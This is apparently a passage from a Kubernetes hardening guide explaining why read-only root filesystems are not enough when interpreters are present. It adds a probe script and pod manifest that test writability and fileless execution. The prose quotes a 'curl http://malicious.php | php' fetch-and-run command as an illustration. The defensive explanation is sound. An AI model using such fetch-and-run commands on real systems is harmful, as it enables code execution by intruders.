An immutable (read-only) root filesystem prevents an application from writing anywhere in its container's filesystem; only volumes that are explicitly mounted remain writable. This is desirable in the event of an intrusion, as the attacker cannot tamper with the filesystem or drop foreign executables onto it.
However, if there are runtimes (interpreters) available in the container, this alone is not sufficient to prevent code execution. Consider `curl http://malicious.php | php` or `bash -c "echo 'much pasted code'"`: in both cases the attacker's code arrives over the network or the terminal and runs directly from memory, never touching the filesystem.
If the application genuinely needs somewhere to write, an `emptyDir` volume can be mounted at that path while the rest of the root filesystem stays read-only.

Scratch containers pair well with an immutable root filesystem: they contain only your code and the minimal system files it needs, so an attacker has to bring a runtime (or inject into the scratch binary itself) to execute code. Without a writable filesystem and without an interpreter to hand, the attack surface is dramatically reduced.
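The following is an added example, not controlplane's code. In Kubernetes the property discussed above is set with the `securityContext` field `readOnlyRootFilesystem: true`; the manifest below (a hypothetical pod with a placeholder image) pairs it with a tmpfs-backed `emptyDir` (`medium: Memory`) for the one path the application legitimately writes to. The rest of the script is a probe you can run inside a container to verify the hardening and to show its limit: it checks whether the root filesystem is writable, lists which interpreters are on `PATH`, and then executes code fed to `sh` on stdin without ever creating a file, which is exactly the `curl | php` case the text describes. The `kubectl exec ... sh -s < probe.sh` workflow in the comments is an assumption about how you would ship it into a pod.

```shell
#!/bin/sh
# Added example (not controlplane's code). Probe a container the way an
# attacker who has landed in it would, to see what readOnlyRootFilesystem
# does and does not buy you. Run locally, or ship into a pod with
#   kubectl exec -i <pod> -- sh -s < probe.sh      (assumed workflow)

# Hypothetical pod manifest: read-only root filesystem plus a tmpfs emptyDir
# mounted at the single path the app needs to write. Image is a placeholder.
hardened_pod_manifest() {
  cat <<'EOF'
apiVersion: v1
kind: Pod
metadata:
  name: immutable-example
spec:
  containers:
  - name: app
    image: example.invalid/app:scratch   # placeholder image
    securityContext:
      readOnlyRootFilesystem: true
      allowPrivilegeEscalation: false
    volumeMounts:
    - name: scratch
      mountPath: /tmp
  volumes:
  - name: scratch
    emptyDir:
      medium: Memory      # tmpfs: lives in RAM, never on the node's disk
      sizeLimit: 16Mi
EOF
}

# Return 0 if a regular file can be created under $1, 1 otherwise.
# Inside the pod above this fails for / and succeeds for /tmp.
fs_writable() {
  probe="$1/.rw-probe-$$"
  if touch "$probe" 2>/dev/null; then
    rm -f "$probe"
    return 0
  fi
  return 1
}

# Print the interpreters from a fixed candidate list that are on PATH,
# one per line. Each hit is a way to run code without writing a file.
list_interpreters() {
  for i in sh bash dash ash python python3 perl php ruby node lua; do
    command -v "$i" >/dev/null 2>&1 && echo "$i"
  done
  return 0
}

# The text's point in one line: code arrives on stdin and runs from memory.
# A read-only root filesystem does nothing to stop this.
fileless_exec_demo() {
  printf 'echo pwned\n' | sh
}

# Human-readable summary for the container this runs in.
report() {
  if fs_writable /; then
    echo "root filesystem: WRITABLE (readOnlyRootFilesystem not in effect)"
  else
    echo "root filesystem: read-only"
  fi
  n=$(list_interpreters | wc -l | tr -d ' ')
  echo "interpreters on PATH: $n"
  list_interpreters | sed 's/^/  - /'
  echo "fileless exec test: $(fileless_exec_demo)"
}

report
```

If the report lists any interpreter, the read-only root filesystem has removed the "drop a binary" path but not the "pipe code into a runtime" path, which is the argument for scratch images above. Note the probe itself needs `sh` to run: a container in which `kubectl exec ... sh` fails for lack of a shell is the outcome you are aiming for.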
Built with by controlplane